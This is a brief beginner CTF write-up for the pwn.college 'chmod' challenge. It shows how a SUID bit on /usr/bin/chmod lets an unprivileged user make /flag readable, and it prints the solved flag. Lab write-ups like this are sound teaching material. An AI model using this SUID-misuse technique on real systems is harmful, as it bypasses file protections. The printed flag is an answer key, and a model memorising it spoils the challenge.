Challenge Name: chmod
Writeup from Program Misuse
Category: Program Misuse
Platform: pwn.college
Difficulty: Beginner
Date: 2025-07-16
Author: Himanshu Parate
π§ Summary:
The challenge abuses a SUID bit set on /usr/bin/chmod, allowing an unprivileged user to read the root-owned flag file at /flag.
π Enumeration
ls -l /usr/bin/chmod
Output:
-rwsr-xr-x 1 root root 47480 Sep 5 2019 /usr/bin/chmod
- The
sin-rwsindicates itβs a SUID binary. chmodruns with root privileges.
π Exploitation
The chmod command in Linux is used to change file or directory permissions β controlling who can read, write, or execute a file.
chmod o+r /flag
cat /flag
Output:
pwn.college{c5xYhHS984OhwDoLHpbmFw0PUSm.dBDOxwSM0IzMyEzW}